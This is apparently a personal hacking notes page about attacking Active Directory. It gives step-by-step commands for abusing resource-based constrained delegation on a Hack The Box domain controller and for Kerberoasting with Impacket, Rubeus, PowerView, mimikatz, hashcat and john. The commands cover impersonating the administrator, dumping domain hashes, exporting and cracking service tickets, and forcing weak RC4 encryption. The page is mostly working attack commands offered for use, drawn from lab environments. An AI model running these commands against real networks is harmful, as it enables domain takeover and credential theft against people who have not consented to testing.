root💀senseicat:~#

Hack. Eat. Sleep. Repeat!!!

Project maintained by SENSEiXENUS Hosted on GitHub Pages — Theme by mattgraham

AD attacks-:

Abuse Resource-Based Constrained Delegation to Gain Unauthorized Access

In Resource-Based Constrained Delegation (RBCD), we configure the target resource e.g. a database or file server to specify which service accounts are permitted to access it on behalf of users. For example, a database service can be set up to allow specific services, like a web service, to act on behalf of users through assigned security permissions.
This differs from unconstrained and constrained delegation. With unconstrained delegation, service accounts with delegation enabled can access any resource on behalf of users. Similarly, with constrained delegation, service accounts with delegation enabled can access a specific list of resources.
Requirement-:

BCD is configured by setting the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
This attribute specifies which service accounts or systems are permitted to act on behalf of users to access the target resource.
-To exploit this type of delegation, an attacker must gain access to an account with Write permissions on the targeted resource (computer object), such as GenericAll, GenericWrite, and WriteDACL.

User SUPPORT@SUPPORT.HTB which the user I owned before is a member of a group called SHARED SUPPORT ACCOUNTS@SUPPORT.HTB. The group itself have full control to a computer called DC.SUPPORT.HTB, so in other words user SUPPORT have full control to DC.SUPPORT.HTB including write permission.

Exploiting with rbcd tool
Impacket tool [AddCOmputer]Syntax to add a computer-:

addcomputer.py -computer-name 'password' -computer-pass 'password' -dc-ip [ip] '[domain]/[username]:[password]'

Then, we use the RBCD python script to add our new computer to the msds-allowedtoactonbehalfofotheridentity attribute list.RBCD tool

Syntax-:

python3 rbcd.py 10.10.11.174 -u [domain]\\[user] -p '[password]' -t DC -f [newly created computer]

Now, we have what it needs to request a service ticket; we will use the getST.py script from impacket instead of Rubeus to request the service ticket as administrator.

python3 getST.py -spn cifs/[object with unconstrained delegation over] -impersonate [user] -dc-ip [ip] '[domain]/[user]:[password]'

When the ticket is issued, we can use by setting it to variable KRB5CCNAME for impacket-psexec.

Syntax-:

KRB5CCNAME=[ccache file name [endswith .ccache] impacket-psexec [domain]/[user]@[object] -k -no-pass

Dumping the hashes with impacket-secretsdump-:

You can set the KRB5CCNAME as an environmental variable

export KRB5CCNAME=$(pwd)/administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache

Syntax-:

impacket-secretsdump -k -target-ip [ip] [domain name]

Pass the hash with Evil-winrm -:

Reference

Unconstrained Resource Delegation

Kerbroasting

Kerberoasting is a lateral movement/privilege escalation technique in Active Directory environments. This attack targets Service Principal Names (SPN) accounts.They are unique identifiers that uses Kerberos to map a service instance to a service account in which context the service is running.Domain accounts are often used to run services to overcome the network authentication limitations of built-in accounts such as NT AUTHORITY\LOCAL SERVICE. Any domain user can request a Kerberos ticket for any service account in the same domain. This is also possible across forest trusts if authentication is permitted across the trust boundary. All you need to perform a Kerberoasting attack is an account’s cleartext password (or NTLM hash), a shell in the context of a domain user account, or SYSTEM level access on a domain-joined host.
Service accounts are often configured with weak or reused password to simplify administration, and sometimes the password is the same as the username. If the password for a domain SQL Server service account is cracked, you are likely to find yourself as a local admin on multiple servers, if not Domain Admin. Even if cracking a ticket obtained via a Kerberoasting attack gives a low-privilege user account, we can use it to craft service tickets for the service specified in the SPN. For example, if the SPN is set to MSSQL/SRV01, we can access the MSSQL service as sysadmin, enable the xp_cmdshell extended procedure and gain code execution on the target SQL server.

Steps(Kerberoasting with GetUserSPNs.py)

Script-:

We can start by just gathering a listing of SPNs in the domain. To do this, we will need a set of valid domain credentials and the IP address of a Domain Controller. We can authenticate to the Domain Controller with a cleartext password, NT password hash, or even a Kerberos ticket. For our purposes, we will use a password.
Syntax-:

impacket-GetUserSPNs -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend

Requesting a Single TGS ticket

impacket-GetUserSPNs -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev

The next step is to crack with hashcat.

hashcat -m 13100 kerberoasted_sqldev /usr/share/wordlists/rockyou.txt

Saving to an ouptut file

impacket-GetUserSPNs -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev -outputfile kerberoasted_sqldev

Cracked with John-:

Requesting all users

impacket-GetUserSPNs -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request

Using Windows for kerberoasting( Semi Manual mode)

Using setspn binary

setspn -Q */*

We will focus on user accounts and ignore the computer accounts returned by the tool. Using powershell to target a single user-:

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"

Retrieving all tickets with setspn.exe

setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

Now that they are loaded, retrieve with mimikatz

Commands-:

base64 /out::true
kerberos::list /export

Prepping it for cracking

If base64 encoded, decode first it base64
Then, convert to tickets with kirbi2john

Crack with john

Modifying for hashcat

sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' tickets.txt

Using Powerview to capture the tickets

Import-Module .\PowerView.ps1
Get-DomainUser * -spn | select samaccountname

Targeting a specific user

Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat

Exporting to csv format-:

Get-DomainUser * -spn | Get-DomainSPNTicket -Format Hashcat | Export-csv .\powershell.csv -NoTypeInformation

Using Rubeus

Rubeus
Getting all the stats and info

.\Rubeus.exe kerberoast /stats

Let’s use Rubeus to request tickets for accounts with the admincount attribute set to 1. These would likely be high-value targets and worth our initial focus for offline cracking efforts with Hashcat. Be sure to specify the /nowrap flag so that the hash can be more easily copied down for offline cracking using Hashcat. Per the documentation, the ““/nowrap” flag prevents any base64 ticket blobs from being column wrapped for any function”; therefore, we won’t have to worry about trimming white space or newlines before cracking with Hashcat.Using the /nowrap flag

.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap

Other Encryption Types

Kerberoasting tools typically request RC4 encryption when performing the attack and initiating TGS-REQ requests. This is because RC4 is weaker and easier to crack offline using tools such as Hashcat than other encryption algorithms such as AES-128 and AES-256. When performing Kerberoasting in most environments, we will retrieve hashes that begin with $krb5tgs$23$, an RC4 (type 23) encrypted ticket. Sometimes we will receive an AES-256 (type 18) encrypted hash or hash that begins with $krb5tgs$18$. While it is possible to crack AES-128 (type 17) and AES-256 (type 18) TGS tickets using Hashcat, it will typically be significantly more time consuming than cracking an RC4 (type 23) encrypted ticket, but still possible especially if a weak password is chosen. Let’s walk through an example.
Requesting a ticket for user testspn

.\Rubeus.exe kerberoast /user:testspn /nowrap

Checking supported hash type with Powerview, msds-supportedencryptiontypes is set to AES 128/256

Get-DomainUser testspn -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes

Use /tgtdeleg to request for only RC4 encryption hash (type 23)-:

 .\Rubeus.exe kerberoast /user:testspn /nowrap /tgtdeleg